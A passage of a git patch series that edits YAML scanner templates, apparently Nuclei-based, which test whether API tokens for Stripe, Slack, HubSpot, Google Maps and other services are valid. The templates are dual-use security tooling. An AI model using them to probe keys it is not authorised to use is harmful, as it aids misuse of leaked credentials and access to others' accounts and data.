b/apis/googlestreetview.yaml index c70fbee958..14bfba0f9d 100644 --- a/apis/googlestreetview.yaml +++ b/apis/googlestreetview.yaml @@ -8,13 +8,9 @@ info: requests: - method: GET - payloads: - token: token.txt path: - "https://maps.googleapis.com/maps/api/streetview?size=400x400&location=40.720032,-73.988354&fov=90&heading=235&pitch=10&key={{token}}" - redirects: false headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 matchers: - type: status status: diff --git a/apis/googletextsearchplaces.yaml b/apis/googletextsearchplaces.yaml index a174ebb13d..f2975836fc 100644 --- a/apis/googletextsearchplaces.yaml +++ b/apis/googletextsearchplaces.yaml @@ -8,13 +8,9 @@ info: requests: - method: GET - payloads: - token: token.txt path: - "https://maps.googleapis.com/maps/api/place/textsearch/json?query=restaurants+in+Sydney&key={{token}}" - redirects: false headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 matchers: - type: word part: body diff --git a/apis/googletimezone.yaml b/apis/googletimezone.yaml index 3aee14c868..57db4646be 100644 --- a/apis/googletimezone.yaml +++ b/apis/googletimezone.yaml @@ -8,13 +8,9 @@ info: requests: - method: GET - payloads: - token: token.txt path: - "https://maps.googleapis.com/maps/api/timezone/json?location=39.6034810,-119.6822510×tamp=1331161200&key={{token}}" - redirects: false headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 matchers: - type: word part: body diff --git a/apis/heroku.yaml b/apis/heroku.yaml index aa2f7c8fd2..e56f5d0b84 100644 --- a/apis/heroku.yaml +++ b/apis/heroku.yaml @@ -9,13 +9,9 @@ info: requests: - method: POST - payloads: - token: token.txt path: - "https://api.heroku.com/apps" - redirects: false headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Accept: application/vnd.heroku+json; version=3 Authorization: Bearer {{token}} matchers: diff --git a/apis/hubspot.yaml b/apis/hubspot.yaml index c0b48f939d..84ac4ed5de 100644 --- a/apis/hubspot.yaml +++ b/apis/hubspot.yaml @@ -9,14 +9,10 @@ info: requests: - method: GET - payloads: - token: token.txt path: - "https://api.hubapi.com/owners/v2/owners?hapikey={{token}}" - "https://api.hubapi.com/contacts/v1/lists/all/contacts/all?hapikey={{token}}" - redirects: false headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 matchers: - type: word part: body diff --git a/apis/instagram.yaml b/apis/instagram.yaml index 37b1c384cd..885a144e89 100644 --- a/apis/instagram.yaml +++ b/apis/instagram.yaml @@ -9,13 +9,9 @@ info: requests: - method: GET - payloads: - token: token.txt path: - "https://graph.facebook.com/v8.0/me/accounts?access_token={{token}}" - redirects: false headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 matchers: - type: status status: diff --git a/apis/ipstack.yaml b/apis/ipstack.yaml index 9e88a0ea29..1cb3599066 100644 --- a/apis/ipstack.yaml +++ b/apis/ipstack.yaml @@ -9,13 +9,9 @@ info: requests: - method: GET - payloads: - token: token.txt path: - "https://api.ipstack.com/8.8.8.8?access_key={{token}}" - redirects: false headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 matchers: - type: word part: body diff --git a/apis/iterable.yaml b/apis/iterable.yaml index 731cae878e..a3ed3acc45 100644 --- a/apis/iterable.yaml +++ b/apis/iterable.yaml @@ -9,13 +9,9 @@ info: requests: - method: GET - payloads: - token: token.txt path: - "https://api.iterable.com/api/export/data.json?dataTypeName=emailSend&range=Today&onlyFields=List.empty" - redirects: false headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Api_Key: "{{token}}" matchers: - type: word diff --git a/apis/jumpcloud.yaml b/apis/jumpcloud.yaml index 83d1762ea2..2fcb42f44b 100644 --- a/apis/jumpcloud.yaml +++ b/apis/jumpcloud.yaml @@ -9,13 +9,9 @@ info: requests: - method: GET - payloads: - token: token.txt path: - "https://console.jumpcloud.com/api/systems" - redirects: false headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 X-Api-Key: "{{token}}" matchers: - type: word diff --git a/apis/lokalise.yaml b/apis/lokalise.yaml index e48e63e134..c99f3e53d4 100644 --- a/apis/lokalise.yaml +++ b/apis/lokalise.yaml @@ -9,13 +9,9 @@ info: requests: - method: GET - payloads: - token: token.txt path: - "https://api.lokalise.com/api2/projects/" - redirects: false headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 X-Api-Token: "{{token}}" matchers: - type: status diff --git a/apis/loqate.yaml b/apis/loqate.yaml index d2680360a3..4cad66efea 100644 --- a/apis/loqate.yaml +++ b/apis/loqate.yaml @@ -9,13 +9,9 @@ info: requests: - method: GET - payloads: - token: token.txt path: - "api.addressy.com/Capture/Interactive/Find/v1.00/json3.ws?Key={{token}}&Countries=US,CA&Language=en&Limit=5&Text=BHAR" - redirects: false headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 matchers: - type: word part: body diff --git a/apis/mailchimp.yaml b/apis/mailchimp.yaml index 0bf97594af..e308a4ee35 100644 --- a/apis/mailchimp.yaml +++ b/apis/mailchimp.yaml @@ -11,8 +11,6 @@ network: - inputs: - data: "AUTH PLAIN {{base64(hex_decode('00')+'apikey'+hex_decode('00')+token)}}\r\n" read: 1024 - payloads: - token: token.txt host: - "tls://smtp.mandrillapp.com:465" matchers: diff --git a/apis/mailgun.yaml b/apis/mailgun.yaml index 522c2bf958..6e01dfc5b4 100644 --- a/apis/mailgun.yaml +++ b/apis/mailgun.yaml @@ -9,13 +9,9 @@ info: requests: - method: GET - payloads: - token: token.txt path: - "https://api.mailgun.net/v3/domains" - redirects: false headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Authorization: Basic {{base64('api:' + token)}} matchers: - type: status diff --git a/apis/mapbox.yaml b/apis/mapbox.yaml index 568cc4b92c..f4dc3ea1a2 100644 --- a/apis/mapbox.yaml +++ b/apis/mapbox.yaml @@ -9,13 +9,9 @@ info: requests: - method: GET - payloads: - token: token.txt path: - "https://api.mapbox.com/geocoding/v5/mapbox.places/Los%20Angeles.json?access_token={{token}}" - redirects: false headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 matchers: - type: status status: diff --git a/apis/nerdgraph.yaml b/apis/nerdgraph.yaml index d4ac8b067c..b9b5faa71b 100644 --- a/apis/nerdgraph.yaml +++ b/apis/nerdgraph.yaml @@ -9,13 +9,9 @@ info: requests: - method: POST - payloads: - token: token.txt path: - "https://api.newrelic.com/graphql" - redirects: false headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Content-Type: application/json API-Key: "{{token}}" body: "{ \"query\": \"{ requestContext { userId apiKey }}\" }" diff --git a/apis/npm.yaml b/apis/npm.yaml index 24796b2f09..415f1ac2c5 100644 --- a/apis/npm.yaml +++ b/apis/npm.yaml @@ -10,13 +10,10 @@ info: requests: - method: GET - payloads: - token: token.txt path: - "https://registry.npmjs.org/-/whoami" headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Authorization: Bearer {{token}} matchers: diff --git a/apis/openweather.yaml b/apis/openweather.yaml index f92082e718..28828cddbf 100644 --- a/apis/openweather.yaml +++ b/apis/openweather.yaml @@ -9,13 +9,9 @@ info: requests: - method: GET - payloads: - token: token.txt path: - "https://api.openweathermap.org/data/2.5/weather?q=Chicago&appid={{token}}" - redirects: false headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 matchers: - type: status status: diff --git a/apis/pagerduty.yaml b/apis/pagerduty.yaml index 990cf6b468..7e52dae038 100644 --- a/apis/pagerduty.yaml +++ b/apis/pagerduty.yaml @@ -9,13 +9,9 @@ info: requests: - method: GET - payloads: - token: token.txt path: - "https://api.pagerduty.com/schedules" - redirects: false headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Accept: application/vnd.pagerduty+json;version=2 Authorization: Token token={{token}} matchers: diff --git a/apis/pendo.yaml b/apis/pendo.yaml index a5383d35f8..b83bb829a7 100644 --- a/apis/pendo.yaml +++ b/apis/pendo.yaml @@ -9,14 +9,10 @@ info: requests: - method: GET - payloads: - token: token.txt path: - "https://app.pendo.io/api/v1/feature" - "https://app.pendo.io/api/v1/metadata/schema/account" - redirects: false headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Content-Type: application/json X-Pendo-Integration-Key: "{{token}}" matchers: diff --git a/apis/pivotaltracker.yaml b/apis/pivotaltracker.yaml index bab9aecbf2..8b2a5d1248 100644 --- a/apis/pivotaltracker.yaml +++ b/apis/pivotaltracker.yaml @@ -9,13 +9,9 @@ info: requests: - method: GET - payloads: - token: token.txt path: - "https://www.pivotaltracker.com/services/v5/me" - redirects: false headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 X-TrackerToken: "{{token}}" matchers: - type: word diff --git a/apis/postmark.yaml b/apis/postmark.yaml index 1acdc4d978..83ec2ba01c 100644 --- a/apis/postmark.yaml +++ b/apis/postmark.yaml @@ -9,13 +9,9 @@ info: requests: - method: GET - payloads: - token: token.txt path: - "https://api.postmarkapp.com/stats/outbound" - redirects: false headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Accept: application/json X-Postmark-Server-Token: "{{token}}" matchers: diff --git a/apis/sendgrid.yaml b/apis/sendgrid.yaml index f8fba977d6..7cc882a115 100644 --- a/apis/sendgrid.yaml +++ b/apis/sendgrid.yaml @@ -13,8 +13,6 @@ network: read: 1024 - data: "AUTH PLAIN {{base64(hex_decode('00')+'apikey'+hex_decode('00')+token)}}\r\n" read: 1024 - payloads: - token: token.txt host: - "tls://smtp.sendgrid.net:465" matchers: diff --git a/apis/slack.yaml b/apis/slack.yaml index 7f4413fa00..cbca7469e2 100644 --- a/apis/slack.yaml +++ b/apis/slack.yaml @@ -9,13 +9,9 @@ info: requests: - method: POST - payloads: - token: token.txt path: - "https://slack.com/api/auth.test" - redirects: false headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Authorization: Bearer {{token}} matchers: - type: word diff --git a/apis/sonarcloud.yaml b/apis/sonarcloud.yaml index a298ad7fb7..dd7f5ba4f5 100644 --- a/apis/sonarcloud.yaml +++ b/apis/sonarcloud.yaml @@ -9,13 +9,9 @@ info: requests: - method: GET - payloads: - token: token.txt path: - "https://sonarcloud.io/api/authentication/validate" - redirects: false headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Authorization: Basic {{base64(token + ':')}} matchers: - type: word diff --git a/apis/spotify.yaml b/apis/spotify.yaml index 88edd113aa..59cdc47c24 100644 --- a/apis/spotify.yaml +++ b/apis/spotify.yaml @@ -9,13 +9,9 @@ info: requests: - method: GET - payloads: - token: token.txt path: - "https://api.spotify.com/v1/me" - redirects: false headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Authorization: Bearer {{token}} matchers: - type: status diff --git a/apis/square.yaml b/apis/square.yaml index 58322efd06..1c60bf47ec 100644 --- a/apis/square.yaml +++ b/apis/square.yaml @@ -9,14 +9,10 @@ info: requests: - method: GET - payloads: - token: token.txt path: - "https://connect.squareup.com/v2/locations" - "https://connect.squareupsandbox.com/v2/locations" - redirects: false headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Content-Type: application/json Authorization: Bearer {{token}} matchers: diff --git a/apis/stripe.yaml b/apis/stripe.yaml index 67435be918..c9a3d40ecc 100644 --- a/apis/stripe.yaml +++ b/apis/stripe.yaml @@ -9,13 +9,9 @@ info: requests: - method: GET - payloads: - token: token.txt path: - "https://api.stripe.com/v1/charges" - redirects: false headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Authorization: Basic {{base64(token + ':')}} matchers: - type: status diff --git a/apis/tinypng.yaml b/apis/tinypng.yaml index 6711eab16a..c06163e7f6 100644 --- a/apis/tinypng.yaml +++ b/apis/tinypng.yaml @@ -9,13 +9,9 @@ info: requests: - method: POST - payloads: - token: token.txt path: - "https://api.tinify.com/shrink" - redirects: false headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Authorization: Basic {{base64('api:' + token)}} matchers: - type: word diff --git a/apis/token.txt b/apis/token.txt deleted file mode 100644 index 3b8fcea50b..0000000000 --- a/apis/token.txt +++ /dev/null @@ -1 +0,0 @@ -exampleAPItokenhere diff --git a/apis/travisci.yaml b/apis/travisci.yaml index 7d3d39fa33..7b7390b58d 100644 --- a/apis/travisci.yaml +++ b/apis/travisci.yaml @@ -9,13 +9,9 @@ info: requests: - method: GET - payloads: - token: token.txt path: - "https://api.travis-ci.com/user" - redirects: false headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Travis-API-Version: 3 Authorization: token {{token}} matchers: diff --git a/apis/twitter.yaml b/apis/twitter.yaml index eaac88b705..238ce5cced 100644 --- a/apis/twitter.yaml +++ b/apis/twitter.yaml @@ -9,13 +9,9 @@ info: requests: - method: GET - payloads: - token: token.txt path: - "https://api.twitter.com/1.1/account_activity/all/subscriptions/count.json" - redirects: false headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Authorization: Bearer {{token}} matchers: - type: word diff --git a/apis/visualstudio.yaml b/apis/visualstudio.yaml index c5354310a1..b53d16d475 100644 --- a/apis/visualstudio.yaml +++ b/apis/visualstudio.yaml @@ -9,13 +9,9 @@ info: requests: - method: GET - payloads: - token: token.txt path: - "https://api.appcenter.ms/v0.1/apps" - redirects: false headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Content-Type: application/json X-Api-Token: "{{token}}" matchers: diff --git a/apis/wakatime.yaml b/apis/wakatime.yaml index b1c8e0c71f..f4d50d0e21 100644 --- a/apis/wakatime.yaml +++ b/apis/wakatime.yaml @@ -9,13 +9,9 @@ info: requests: - method: GET - payloads: - token: token.txt path: - "https://wakatime.com/api/v1/users/current/projects/?api_key={{token}}" - redirects: false headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 matchers: - type: status status: diff --git a/apis/weglot.yaml b/apis/weglot.yaml index 1251c711d5..14d5926d4c 100644 --- a/apis/weglot.yaml +++ b/apis/weglot.yaml @@ -9,13 +9,9 @@ info: requests: - method: POST - payloads: - token: token.txt path: - "https://api.weglot.com/translate?api_key={{token}}" - redirects: false headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Content-Type: application/json body: "{\"l_from\":\"en\",\"l_to\":\"fr\",\"request_url\":\"https://www.website.com/\",\"words\":[{\"w\":\"This is a blue car\",\"t\":1},{\"w\":\"This is a black car\",\"t\":1}]}" matchers: diff --git a/apis/youtube.yaml b/apis/youtube.yaml index 66713ee278..48cda6e7cb 100644 --- a/apis/youtube.yaml +++ b/apis/youtube.yaml @@ -9,13 +9,9 @@ info: requests: - method: GET - payloads: - token: token.txt path: - "https://www.googleapis.com/youtube/v3/activities?part=contentDetails&maxResults=25&channelId=UC-lHJZR3Gqxm24_Vd_AJ5Yw&key={{token}}" - redirects: false headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 matchers-condition: or matchers: - type: word From 07d68212d18380bdc00ebe7271c1da9c6f7cd174 Mon Sep 17 00:00:00 2001 From: "zzeitlin@bishopfox.com" <58756038+zzeitlin@users.noreply.github.com> Date: Fri, 1 Oct 2021 19:49:16 +0000 Subject: [PATCH 2691/4083] Remove empty header lines --- apis/bingmaps.yaml | 1 - apis/bitly.yaml | 1 - apis/buttercms.yaml | 1 - apis/circleci.yaml | 1 - apis/deviantart.yaml | 1 - apis/googleautocomplete.yaml | 1 - apis/googlecustomsearch.yaml | 1 - apis/googledirections.yaml | 3 +-- apis/googleelevation.yaml | 1 - apis/googlefindplacefromtext.yaml | 1 - apis/googlegedistancematrix.yaml | 1 - apis/googlegeocode.yaml | 1 - apis/googlegeolocation.yaml | 1 - apis/googlemapsembed.yaml | 1 - apis/googlemapsembedadvanced.yaml | 1 - apis/googlenearbysearch.yaml | 1 - apis/googlenearestroads.yaml | 1 - apis/googleplacedetails.yaml | 1 - apis/googleplacesphoto.yaml | 1 - apis/googleplayablelocations.yaml | 1 - apis/googleroutetotraveled.yaml | 1 - apis/googlespeedlimit.yaml | 1 - apis/googlestaticmaps.yaml | 1 - apis/googlestreetview.yaml | 1 - apis/googletextsearchplaces.yaml | 1 - apis/googletimezone.yaml | 1 - apis/hubspot.yaml | 1 - apis/instagram.yaml | 1 - apis/ipstack.yaml | 1 - apis/loqate.yaml | 1 - apis/mapbox.yaml | 1 - apis/npm.yaml | 3 --- apis/openweather.yaml | 1 - apis/wakatime.yaml | 1 - apis/youtube.yaml | 1 - 35 files changed, 1 insertion(+), 38 deletions(-) diff --git a/apis/bingmaps.yaml b/apis/bingmaps.yaml index fddae385db..2045fd7554 100644 --- a/apis/bingmaps.yaml +++ b/apis/bingmaps.yaml @@ -11,7 +11,6 @@ requests: - method: GET path: - "https://dev.virtualearth.net/REST/v1/Locations?CountryRegion=US&adminDistrict=WA&locality=Somewhere&postalCode=98001&addressLine=100%20Main%20St.&key={{token}}" - headers: matchers: - type: word part: body diff --git a/apis/bitly.yaml b/apis/bitly.yaml index 5551d02fee..56edf06e97 100644 --- a/apis/bitly.yaml +++ b/apis/bitly.yaml @@ -11,7 +11,6 @@ requests: - method: GET path: - "https://api-ssl.bitly.com/v3/shorten?access_token={{token}}&longUrl=https://www.google.com" - headers: matchers: - type: word part: body diff --git a/apis/buttercms.yaml b/apis/buttercms.yaml index d412bf8581..1b3c0a47e8 100644 --- a/apis/buttercms.yaml +++ b/apis/buttercms.yaml @@ -11,7 +11,6 @@ requests: - method: GET path: - "https://api.buttercms.com/v2/posts/?auth_token={{token}}" - headers: matchers: - type: status status: diff --git a/apis/circleci.yaml b/apis/circleci.yaml index 3ec7629cd6..0a77779137 100644 --- a/apis/circleci.yaml +++ b/apis/circleci.yaml @@ -11,7 +11,6 @@ requests: - method: GET path: - "https://circleci.com/api/v1.1/me?circle-token={{token}}" - headers: matchers: - type: status status: diff --git a/apis/deviantart.yaml b/apis/deviantart.yaml index 304bd8ce69..94b32417ab 100644 --- a/apis/deviantart.yaml +++ b/apis/deviantart.yaml @@ -11,7 +11,6 @@ requests: - method: POST path: - "https://www.deviantart.com/api/v1/oauth2/placebo" - headers: body: "access_token={{token}}" matchers: - type: word diff --git a/apis/googleautocomplete.yaml b/apis/googleautocomplete.yaml index 89218f3616..abcfedc639 100644 --- a/apis/googleautocomplete.yaml +++ b/apis/googleautocomplete.yaml @@ -10,7 +10,6 @@ requests: - method: GET path: - "https://maps.googleapis.com/maps/api/place/autocomplete/json?input=Bingh&types=%28cities%29&key={{token}}" - headers: matchers: - type: word part: body diff --git a/apis/googlecustomsearch.yaml b/apis/googlecustomsearch.yaml index a3bcfe55d3..e59e03edb3 100644 --- a/apis/googlecustomsearch.yaml +++ b/apis/googlecustomsearch.yaml @@ -10,7 +10,6 @@ requests: - method: GET path: - "https://www.googleapis.com/customsearch/v1?cx=017576662512468239146:omuauf_lfve&q=lectures&key={{token}}" - headers: matchers: - type: word part: body diff --git a/apis/googledirections.yaml b/apis/googledirections.yaml index 91478e6728..65236a5630 100644 --- a/apis/googledirections.yaml +++ b/apis/googledirections.yaml @@ -10,10 +10,9 @@ requests: - method: GET path: - "https://maps.googleapis.com/maps/api/directions/json?origin=Disneyland&destination=Universal+Studios+Hollywood4&key={{token}}" - headers: matchers: - type: word part: body words: - 'error_message' - negative: true \ No newline at end of file + negative: true diff --git a/apis/googleelevation.yaml b/apis/googleelevation.yaml index a8c685513d..bd7ef895c5 100644 --- a/apis/googleelevation.yaml +++ b/apis/googleelevation.yaml @@ -10,7 +10,6 @@ requests: - method: GET path: - "https://maps.googleapis.com/maps/api/elevation/json?locations=39.7391536,-104.9847034&key={{token}}" - headers: matchers: - type: word part: body diff --git a/apis/googlefindplacefromtext.yaml b/apis/googlefindplacefromtext.yaml index 26c368fe82..0976a79a37 100644 --- a/apis/googlefindplacefromtext.yaml +++ b/apis/googlefindplacefromtext.yaml @@ -10,7 +10,6 @@ requests: - method: GET path: - "https://maps.googleapis.com/maps/api/place/findplacefromtext/json?input=Museum%20of%20Contemporary%20Art%20Australia&inputtype=textquery&fields=photos,formatted_address,name,rating,opening_hours,geometry&key={{token}}" - headers: matchers: - type: word part: body diff --git a/apis/googlegedistancematrix.yaml b/apis/googlegedistancematrix.yaml index 3c8e8c0f1c..ceab537ca0 100644 --- a/apis/googlegedistancematrix.yaml +++ b/apis/googlegedistancematrix.yaml @@ -10,7 +10,6 @@ requests: - method: GET path: - "https://maps.googleapis.com/maps/api/distancematrix/json?units=imperial&origins=40.6655101,-73.89188969999998&destinations=40.6905615%2C-73.9976592%7C40.6905615%2C-73.9976592%7C40.6905615%2C-73.9976592%7C40.6905615%2C-73.9976592%7C40.6905615%2C-73.9976592%7C40.6905615%2C-73.9976592%7C40.659569%2C-73.933783%7C40.729029%2C-73.851524%7C40.6860072%2C-73.6334271%7C40.598566%2C-73.7527626%7C40.659569%2C-73.933783%7C40.729029%2C-73.851524%7C40.6860072%2C-73.6334271%7C40.598566%2C-73.7527626&key={{token}}" - headers: matchers: - type: word part: body diff --git a/apis/googlegeocode.yaml b/apis/googlegeocode.yaml index 29c641a3fc..204031fd34 100644 --- a/apis/googlegeocode.yaml +++ b/apis/googlegeocode.yaml @@ -10,7 +10,6 @@ requests: - method: GET path: - "https://maps.googleapis.com/maps/api/geocode/json?latlng=40,30&key={{token}}" - headers: matchers: - type: word part: body diff --git a/apis/googlegeolocation.yaml b/apis/googlegeolocation.yaml index 548eeb0d5f..3dd6766951 100644 --- a/apis/googlegeolocation.yaml +++ b/apis/googlegeolocation.yaml @@ -10,7 +10,6 @@ requests: - method: GET path: - "https://www.googleapis.com/geolocation/v1/geolocate?key={{token}}" - headers: matchers-condition: and matchers: - type: word diff --git a/apis/googlemapsembed.yaml b/apis/googlemapsembed.yaml index 1b6143073f..35c549d87f 100644 --- a/apis/googlemapsembed.yaml +++ b/apis/googlemapsembed.yaml @@ -10,7 +10,6 @@ requests: - method: GET path: - "https://www.google.com/maps/embed/v1/place?q=Seattle&key={{token}}" - headers: matchers: - type: status status: diff --git a/apis/googlemapsembedadvanced.yaml b/apis/googlemapsembedadvanced.yaml index ebd7e16135..6815b9aaf2 100644 --- a/apis/googlemapsembedadvanced.yaml +++ b/apis/googlemapsembedadvanced.yaml @@ -10,7 +10,6 @@ requests: - method: GET path: - "https://www.google.com/maps/embed/v1/search?q=record+stores+in+Seattle&key={{token}}" - headers: matchers: - type: status status: diff --git a/apis/googlenearbysearch.yaml b/apis/googlenearbysearch.yaml index c26bada610..78db51e9c8 100644 --- a/apis/googlenearbysearch.yaml +++ b/apis/googlenearbysearch.yaml @@ -10,7 +10,6 @@ requests: - method: GET path: - "https://maps.googleapis.com/maps/api/place/nearbysearch/json?location=-33.8670522,151.1957362&radius=100&types=food&name=harbour&key={{token}}" - headers: matchers: - type: word part: body diff --git a/apis/googlenearestroads.yaml b/apis/googlenearestroads.yaml index f6916116f1..1dd7f6e8be 100644 --- a/apis/googlenearestroads.yaml +++ b/apis/googlenearestroads.yaml @@ -10,7 +10,6 @@ requests: - method: GET path: - "https://roads.googleapis.com/v1/nearestRoads?points=60.170880,24.942795|60.170879,24.942796|60.170877,24.942796&key={{token}}" - headers: matchers: - type: word part: body diff --git a/apis/googleplacedetails.yaml b/apis/googleplacedetails.yaml index 781058d508..23b2d293da 100644 --- a/apis/googleplacedetails.yaml +++ b/apis/googleplacedetails.yaml @@ -10,7 +10,6 @@ requests: - method: GET path: - "https://maps.googleapis.com/maps/api/place/details/json?place_id=ChIJN1t_tDeuEmsRUsoyG83frY4&fields=name,rating,formatted_phone_number&key={{token}}" - headers: matchers: - type: word part: body diff --git a/apis/googleplacesphoto.yaml b/apis/googleplacesphoto.yaml index 9d9271864c..b2ecc55be0 100644 --- a/apis/googleplacesphoto.yaml +++ b/apis/googleplacesphoto.yaml @@ -10,7 +10,6 @@ requests: - method: GET path: - "https://maps.googleapis.com/maps/api/place/photo?maxwidth=400&photoreference=CnRtAAAATLZNl354RwP_9UKbQ_5Psy40texXePv4oAlgP4qNEkdIrkyse7rPXYGd9D_Uj1rVsQdWT4oRz4QrYAJNpFX7rzqqMlZw2h2E2y5IKMUZ7ouD_SlcHxYq1yL4KbKUv3qtWgTK0A6QbGh87GB3sscrHRIQiG2RrmU_jF4tENr9wGS_YxoUSSDrYjWmrNfeEHSGSc3FyhNLlBU&key={{token}}" - headers: matchers: - type: status status: diff --git a/apis/googleplayablelocations.yaml b/apis/googleplayablelocations.yaml index 068ef45d58..1f192e65a5 100644 --- a/apis/googleplayablelocations.yaml +++ b/apis/googleplayablelocations.yaml @@ -10,7 +10,6 @@ requests: - method: GET path: - "https://playablelocations.googleapis.com/v3:samplePlayableLocations?key={{token}}" - headers: matchers: - type: word part: body diff --git a/apis/googleroutetotraveled.yaml b/apis/googleroutetotraveled.yaml index e6a943ac1d..c3f197ec99 100644 --- a/apis/googleroutetotraveled.yaml +++ b/apis/googleroutetotraveled.yaml @@ -10,7 +10,6 @@ requests: - method: GET path: - "https://roads.googleapis.com/v1/snapToRoads?path=-35.27801,149.12958|-35.28032,149.12907&interpolate=true&key={{token}}" - headers: matchers: - type: word part: body diff --git a/apis/googlespeedlimit.yaml b/apis/googlespeedlimit.yaml index 785d09e3f0..cc52b5167f 100644 --- a/apis/googlespeedlimit.yaml +++ b/apis/googlespeedlimit.yaml @@ -10,7 +10,6 @@ requests: - method: GET path: - "https://roads.googleapis.com/v1/speedLimits?path=38.75807927603043,-9.03741754643809&key={{token}}" - headers: matchers: - type: word part: body diff --git a/apis/googlestaticmaps.yaml b/apis/googlestaticmaps.yaml index 35585fd3f2..0036fb01b7 100644 --- a/apis/googlestaticmaps.yaml +++ b/apis/googlestaticmaps.yaml @@ -10,7 +10,6 @@ requests: - method: GET path: - "https://maps.googleapis.com/maps/api/staticmap?center=45%2C10&zoom=7&size=400x400&key={{token}}" - headers: matchers: - type: status status: diff --git a/apis/googlestreetview.yaml b/apis/googlestreetview.yaml index 14bfba0f9d..449bee3291 100644 --- a/apis/googlestreetview.yaml +++ b/apis/googlestreetview.yaml @@ -10,7 +10,6 @@ requests: - method: GET path: - "https://maps.googleapis.com/maps/api/streetview?size=400x400&location=40.720032,-73.988354&fov=90&heading=235&pitch=10&key={{token}}" - headers: matchers: - type: status status: diff --git a/apis/googletextsearchplaces.yaml b/apis/googletextsearchplaces.yaml index f2975836fc..0331c9c039 100644 --- a/apis/googletextsearchplaces.yaml +++ b/apis/googletextsearchplaces.yaml @@ -10,7 +10,6 @@ requests: - method: GET path: - "https://maps.googleapis.com/maps/api/place/textsearch/json?query=restaurants+in+Sydney&key={{token}}" - headers: matchers: - type: word part: body diff 